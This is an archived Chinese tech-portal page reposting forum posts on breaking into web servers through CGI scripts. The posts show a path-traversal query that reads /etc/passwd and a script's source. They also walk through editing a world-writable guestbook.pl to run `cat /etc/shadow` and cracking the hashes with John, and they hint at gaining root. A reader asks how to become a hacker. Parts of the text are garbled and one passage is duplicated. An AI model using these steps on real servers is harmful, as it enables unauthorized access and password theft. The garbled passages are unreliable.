您现在的位置: 天极网 > 利用cgi-bin的漏洞

利用cgi-bin的漏洞

2000-06-28 00:00作者:-出处:西池责任编辑:
胰タ戳艘豢矗⑾种饕衬谌菥雇耆淞搜0?...
不过好在,工夫不负有心人终于找到它的新地址:

http://161.53.42.3/~crv/security/
                   
?在 Hotaru (Tomoe Hotaru) 的大作中提到: 】
: 近日到一个日本漫画个人主页转转,发现有一个cgi是这样的:
: http://www.somewhere.co.jp/~someone/view_cg.cgi
: 是用来看cg的cgi。(个人主页可以放自己的cgi?????),用法是
: view_cg.cgi?html=xxxx.html&cg=xxxx.jpg (大概是这样吧)
: 嘿嘿,漏洞很明显吧!试一试
: view_cg.cgi?html=/etc/passwd
: 看到了!不过shadow了的...-_-!
: 不过这个管理员没有用root来跑httpd,不然的话...
: 再试:
: view_cg.cgi?html=view_cg.cgi
: 拿到源代码,再仔细看看吧,哈!

用什么方法进入的?我很想学一学做黑客!
做黑客要有什么知识范围,和需要什么软件呢?
我的E-MAIL是:fstony@163.net
请给予我E-MAIL       


事先声明,我并无意破坏的,我当然也不会透露是哪台机,
: 不过其安全性之差实在无话可说... :)
: 手段是利用cgi。具体过程是这样的:
: 先用我的普通用户帐号telnet进去,找到cgi-bin目录。可用
: 命令: find / -name cgi-bin
: 之后当然进入该目录看看又有什么收获啦!
: $ ls -l
: ....
: ....(省略)
: -rwxrwxrwx root other ... guestbook.pl
: ....
: ....
: 哇,怎么样,有头绪了吧?没错!这个文件是可任意修改的!
: (那个笨root,怎么搞的?)
: (记住修改之前先把它备份!!!!)
: 好,发挥你的想象力吧。我先试着删除了大部分代码,再加入
@data = `cat /etc/shadow`;
: print @data;
: 存盘,在浏览器中打入:
: http://www.xyz.abc/cgi-bin/guestbook.pl
: 之后,shadow档一览无余!
: 赶快存盘,再恢复原先的guestbook.pl,闪人了!到john上场了!
: 其实,还可以利用它,可以轻而易举获得root shell。这里不多
: 之后当然进入该目录看看又有什么收获啦!
: $ ls -l
: ....
: ....(省略)
: -rwxrwxrwx root other ... guestbook.pl
: ....
: ....
: 哇,怎么样,有头绪了吧?没错!这鑫募?强扇? 薷牡模?
: (那个笨root,怎么搞的?)
: (记住修改之前先把它备份!!!!)
: 好,发挥你的想象力吧。我先试着删除了大部分代码,再加入
: @data = `cat /etc/shadow`;
: print @data;
: 存盘,在浏览器中打入:
: http://www.xyz.abc/cgi-bin/guestbook.pl
: 之后,shadow档一览无余!
: 赶快存盘,再恢复原先的guestbook.pl,闪人了!到john上场了!
: 其实,还可以利用它,可以轻而易举获得root shell。这里不多
: 说了,自己想想吧!
共1页。 1
相关文章及产品
关注此文读者还看过
相关
文章排行
本周
本月
最近更新
关于我们|网站律师|天极服务|电子杂志|RSS订阅|加入我们|网站地图
TMG
Copyright (C) 1999-2008 Chinabyte.com, All Rights Reserved 版权所有 天极网络
商务联系、网站内容、合作建议:010-82657868
版权声明 在线提交意见反馈 Powered by 天极内容管理平台CMS4i
经营性网站备案信息 网警备案 中国网站排名
天极传媒:天极网|比特网|IT专家网|IT商网|52PK游戏网|IT分众